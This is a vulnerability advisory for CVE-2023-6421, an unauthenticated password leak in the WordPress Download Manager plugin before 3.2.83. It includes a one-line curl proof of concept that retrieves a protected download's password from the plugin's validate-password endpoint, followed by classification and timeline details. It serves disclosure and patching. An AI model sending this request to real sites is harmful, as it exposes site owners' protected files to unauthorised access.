Download Manager < 3.2.83 – Unauthenticated Protected File Download Password Leak | CVE 2023-6421 | Plugin Vulnerabilities

Description

The plugin does not protect file download's passwords, leaking it upon receiving an invalid one.

Proof of Concept

223 being the ID of a password protected download:

curl -X POST --data '__wpdm_ID=223&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322' https://example.com/wp-json/wpdm/validate-password

 The response will contain the password in the 'op' field

Affects Plugins

download-manager

Fixed in 3.2.83

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Liu Shaohong

Submitter

Liu Shaohong

Verified

Yes

WPVDB ID

244c7c00-fc8d-4a73-bbe0-7865c621d410

Timeline

Publicly Published

2023-11-29 (about 2 years ago)

Added

2023-12-09 (about 2 years ago)

Last Updated

2023-12-09 (about 2 years ago)

Other

Published

Title

Published

2024-10-24

Title

Mapster WP Maps < 1.6.0 - Incorrect Authorization to Authenticated (Contributor+) Arbitrary Options Update

Published

2023-03-10

Title

GiveWP < 2.25.2 - Contributor+ Arbitrary Content Deletion

Published

2025-03-03

Title

Ultimate WordPress Auction Plugin < 4.3.0 - Contributor+ Arbitrary Post Deletion

Published

2024-05-08

Title

Swift Performance Lite < 2.3.6.19 - Subscriber+ Settings Update

Published

2025-11-18

Title

SiteSEO – SEO Simplified < 1.3.3 - Authenticated Settings Reset